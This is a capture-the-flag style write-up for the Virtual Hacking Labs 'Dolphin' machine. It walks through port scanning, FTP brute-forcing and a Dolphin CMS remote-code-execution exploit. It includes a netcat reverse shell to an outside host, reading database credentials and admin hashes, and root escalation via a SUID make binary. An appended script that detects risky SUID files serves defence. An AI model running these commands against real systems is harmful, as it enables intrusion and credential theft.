xsspresso
Web | Medium | Linux

VHL — Dolphin

Dolphin CMS with a WordPress instance on port 81. Admin credential brute-force leads to plugin RCE and privilege escalation.

February 12, 2025 | Virtual Hacking Labs
#Dolphin CMS #WordPress #Brute Force #RCE

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 15:53 EST
Nmap scan report for 10.11.1.58
Host is up (0.022s latency).
Not shown: 65531 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ed:5d:8e:e9:c3:17:74:b3:e8:ee:a4:f1:b8:e3:47:6d (RSA)
|   256 99:02:13:1e:71:99:d1:32:23:20:e2:fb:bb:65:5f:b7 (ECDSA)
|_  256 75:2c:60:32:65:f9:bd:7c:5b:72:06:97:84:f7:20:a3 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Dolphin CMS
|_http-server-header: Apache/2.4.41 (Ubuntu)
81/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dolphin
|_http-generator: WordPress 6.0
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/12%OT=21%CT=1%CU=33154%PV=Y%DS=2%DC=I%G=Y%TM=67AD
OS:0A78%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)SEQ(S
OS:P=105%GCD=1%ISR=107%TI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=107%TI=Z%II=I%TS
OS:=A)SEQ(SP=106%GCD=2%ISR=107%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST1
OS:1NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE
OS:88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5
OS:B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   22.11 ms 10.11.1.58

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.63 seconds
```

21

```sh
21/tcp open  ftp     ProFTPD
```

```sh
ftp anonymous@10.11.1.58
Connected to 10.11.1.58.
220 ProFTPD Server (Debian) [::ffff:10.11.1.58]
331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
```

```sh
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.11.1.58
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-12 15:55:31
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.11.1.58:21/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-12 15:55:33
```

80

```sh
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Dolphin CMS
|_http-server-header: Apache/2.4.41 (Ubuntu)
```

81

```sh
81/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dolphin
|_http-generator: WordPress 6.0
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
```

BoonEx Dolphin

Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution

  • https://www.exploit-db.com/exploits/40756
```sh
python2 40756.py http://10.11.1.58/ 
[+] Dolphin <= 7.3.2 Auth bypass / RCE exploit
[+] Author : Ahmed sultan (0x4148)
[+] Home : 0x4148.com

 + Sending payload to 10.11.1.58
 * Checking if payload was send
 + php prompt up and running
 + type 'shell' to get shell access

php>> shell 

 + Switched to Shell mode
 + Type 'return' to return to php prompt mode

0x4148@10.11.1.58# whoami
www-data
```

```sh
busybox nc 172.16.1.1 1234 -e bash
```

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

```sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.58] 45226
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@dolphin:/var/www/html/tmp$ whoami
whoami
www-data
```

```sh
www-data@dolphin:/$ uname -a
uname -a
Linux dolphin 5.4.0-120-generic #136-Ubuntu SMP Fri Jun 10 13:40:48 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
www-data@dolphin:/$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.4 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.4 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
```

wp-config.php

```php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wordpress' );

/** Database password */
define( 'DB_PASSWORD', 'P4aSsVV0rD!3' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );
```

```sh
www-data@dolphin:/var/www/html/wordpress$ mysql -u 'wordpress' -p'P4aSsVV0rD!3'
```

```sh
mysql> use wordpress
```

```sh
mysql> select * from wp_users;
select * from wp_users;
+----+---------------+------------------------------------+---------------+-------------------------+-------------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email              | user_url                | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+-------------------------+-------------------------+---------------------+---------------------+-------------+---------------+
|  1 | administrator | $P$BI2TXgSf/gAL69uUCkj02PbsmSNKIV/ | administrator | dolphin@localhost.local | http://192.168.6.176:81 | 2022-06-17 14:49:10 |                     |           0 | administrator |
+----+---------------+------------------------------------+---------------+-------------------------+-------------------------+---------------------+---------------------+-------------+---------------+
1 row in set (0.00 sec)
```

priv esc

linpeas

```sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found

-rwsr-xr-x 1 root root 226K Jul 28  2018 /usr/bin/make
```

SUID (make)

  • https://gtfobins.github.io/gtfobins/make/#suid
```sh
COMMAND='/bin/bash -p'
/usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
```

```sh
www-data@dolphin:/tmp$ COMMAND='/bin/bash -p'
COMMAND='/bin/bash -p'
www-data@dolphin:/tmp$ /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
/usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
bash-5.0# whoami
whoami
root
bash-5.0# cat /root/key.txt
cat /root/key.txt
hjf9dhjd31djasd328rh
bash-5.0# date
date
Wed Feb 12 21:45:48 UTC 2025
```
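
A defender-side check for the set-uid `make` finding above, as an added example that is not part of the original writeup: it flags set-uid files whose program can run arbitrary commands and prints the command that clears the bit. The deny-list `RISKY_SUID` and all function names are assumptions made for illustration, and the sample paths are constructed.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag set-uid files whose
# program can run arbitrary commands, such as the /usr/bin/make found above.

# Constructed deny-list (assumption); extend it from the GTFOBins SUID category.
RISKY_SUID="make bash dash sh find vim python3 perl env awk"

# is_risky NAME: succeed when NAME is on the deny-list.
is_risky() {
    for risky in $RISKY_SUID; do
        [ "$1" = "$risky" ] && return 0
    done
    return 1
}

# flag_risky_suid: read one path per line on stdin and print the paths
# whose basename is on the deny-list.
flag_risky_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if is_risky "${path##*/}"; then
            printf '%s\n' "$path"
        fi
    done
}

# scan_suid DIR: list set-uid regular files under DIR (same filesystem only)
# and keep the risky ones.
scan_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | flag_risky_suid
}

# remediation: turn flagged paths into the commands that clear the set-uid bit.
remediation() {
    while IFS= read -r path; do
        printf 'chmod u-s -- %s\n' "$path"
    done
}

# Constructed sample input, modelled on the linpeas finding in this writeup.
sample_paths() {
    printf '%s\n' /usr/bin/passwd /usr/bin/make /usr/bin/sudo /usr/bin/mount
}

sample_paths | flag_risky_suid | remediation
# On a real host, run as root: scan_suid / | remediation
```

Review the printed `chmod` commands before running them; a build tool such as `make` has no need for the set-uid bit.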